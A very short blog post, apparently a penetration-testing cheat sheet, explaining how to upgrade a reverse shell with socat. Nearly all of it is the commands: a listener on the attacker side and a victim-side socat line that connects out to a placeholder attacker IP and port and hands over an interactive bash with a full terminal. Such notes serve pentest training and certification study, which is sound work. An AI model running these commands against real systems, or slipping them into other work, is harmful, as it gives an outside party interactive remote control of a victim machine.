Using SOCAT to upgrade reverse shell
To upgrade your reverse shell you can use various methods:
SOCAT
# Attacker:
socat TCP-L:<port> -
# Victim:
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
References: https://www.101labs.net/comptia-secu...
nexxium.hashnode.dev1 min read